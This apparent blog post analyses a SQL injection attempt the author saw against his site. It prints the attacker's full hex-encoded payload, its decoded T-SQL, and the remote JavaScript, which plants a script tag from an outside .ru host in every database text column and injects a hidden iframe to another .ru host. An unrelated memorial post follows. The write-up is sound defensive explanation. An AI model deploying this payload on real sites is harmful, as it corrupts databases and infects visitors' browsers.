Individual Liberty — Individual Responsibility 

A fairly persistent series of hack attempts

Somebody is trying to hack my site. So far they've been unsuccessful, but they are persistent. How do I know this? Well every time something goes wrong with the site code, (as opposed to something going wrong with my hosting environment) I get an email giving me the details of the failure. That's how I know that someone is trying a SQL Injection attack, and that so far they haven't succeeded. They are persistent though, trying exactly the same routine over and over again.

So, “what is a SQL Injection attack?” This is when the hacker attempts, by modifying the parameters to a query string or form post, to make your site run some extra SQL code along with the normal request. A classic example of such an attack attempts to gain access to secure areas of a website by modifying the parameters to a user lookup routine. This is normally done by taking advantage of the tendency of some developers to use “dynamic SQL” statements that accept unfiltered user input and insert it directly into the statement to be executed.

In any case, the attack being perpetrated here is going after my RSS feeds. They've tried fifteen times using fifteen different IP addresses in the last five hours. Here's the query string they're trying to use…

blogid=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(
0x4445434C415245204054205641524348415228323535292C404320
564152434841522832353529204445434C415245205461626C655F43
7572736F7220435552534F5220464F522053454C45435420612E6E61
6D652C622E6E616D652046524F4D207379736F626A6563747320612C
737973636F6C756D6E73206220574845524520612E69643D622E6964
20414E4420612E78747970653D27752720414E442028622E78747970
653D3939204F5220622E78747970653D3335204F5220622E78747970
653D323331204F5220622E78747970653D31363729204F50454E2054
61626C655F437572736F72204645544348204E4558542046524F4D20
5461626C655F437572736F7220494E544F2040542C4043205748494C
4528404046455443485F5354415455533D302920424547494E204558
45432827555044415445205B272B40542B275D20534554205B272B40
432B275D3D525452494D28434F4E5645525428564152434841522834
303030292C5B272B40432B275D29292B27273C736372697074207372
633D687474703A2F2F7777772E34636E772E72752F6E67672E6A733E
3C2F7363726970743E27272729204645544348204E4558542046524F
4D205461626C655F437572736F7220494E544F2040542C404320454E
4420434C4F5345205461626C655F437572736F72204445414C4C4F43
415445205461626C655F437572736F7220%20AS%20VARCHAR(4000))
;EXEC(@S);--

I've inserted a few line-breaks into that long string so that  it doesn't break my blog formatting here. I haven't seen this particular approach before but if I were using dynamic SQL statements and accepting unfiltered user input to build them before executing them it would play havoc with my site. Without all of those hexadecimal numbers, here's a simplified version…

blogid=1;DECLARE @S VARCHAR(4000); SET @S=CAST(alongbinarynumber AS VARCHAR(4000));EXEC(@S);--

If it's still not clear enough, here's what they're trying to do. The injected code declares a variable name @S as a large character string, sets its value by casting a binary number into string format and then executes the resulting character string as if it were a SQL statement. The semi-colons are used to separate the individual SQL statements, and to get the SQL code past my site's code. The long binary number is used to hide the actual code that the hacker is trying to execute. I've decoded that for you here…

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
    SELECT a.name,b.name
    FROM sysobjects a,syscolumns b
    WHERE a.id=b.id
    AND a.xtype='u'
    AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
    EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.4cnw.ru/ngg.js></script>''')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
END CLOSE Table_Cursor
DEALLOCATE Table_Cursor

So what the hacker is trying to do here is to update every single character or text column in every table in my database by tacking the string “<script src=http://www.4cnw.ru/ngg.js></script>” onto the end of every value. Not only is this person trying to hack my database, they're also trying to hack my pages, to force them to execute a script from a Russian web site every time you load one of the pages.

Here's the script they're trying to make my site force your browser to execute…

window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("vrcgoo=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "vrcgoo=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://cvsr.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e) {
};
}}

So they're trying to use the script engine in your browser to store a tracking cookie on your machine and  insert an IFRAME into the HTML your browser shows. The source document for that IFRAME comes from “http://cvsr.ru/cgi-bin/index.cgi?ad”. I don't think it's necessary to dig into this much further. It's almost a sure bet that downloading that document in your browser will probably infect your computer with some sort of virus, and that you'd never see it coming unless you have antivirus software that pops up an alert immediately. Since the IFRAME is set to have zero width, zero height, and no border, you wouldn't see the IFRAME or the document. You'd only see the effects, and they're sure to be nasty.

My fellow bloggers, if my site is under this sort of attack, you can bet that yours is too. Protect your site visitors! Make sure you're running the latest version of your blogging platform.

Trackposted to third world county, Allie is Wired, Woman Honor Thyself, DragonLady's World, The World According to Carl, The Pink Flamingo, Leaning Straight Up, Cao's Blog, Democrat=Socialist, Dumb Ox Daily News, Conservative Cat, and Right Voices, thanks to Linkfest Haven Deluxe.

Wednesday Hero - 1st LT. Frank B. Walkup, IV

This Weeks Hero Was Suggested By Toni

1st LT. Frank B. Walkup, IV
23 years old from Woodbury, Tennessee
2nd Battalion, 35th Infantry Regiment, 3rd Brigade Combat Team, 25th Infantry Division
June 16, 2007


Toni already has a great post up on her site, so I'll just link to it.

These brave men and women sacrifice so much in their lives so that others may enjoy the freedoms we get to enjoy everyday. For that, I am proud to call them Hero. We Should Not Only Mourn These Men And Women Who Died, We Should Also Thank God That Such People Lived

This post is part of the Wednesday Hero Blogroll. For more information about Wednesday Hero, or if you would like to post it on your site, you can go here.

Wednesday Heroes is published every Wednesday by Indian Chris. None of this material originates with me, but I'm proud to host it.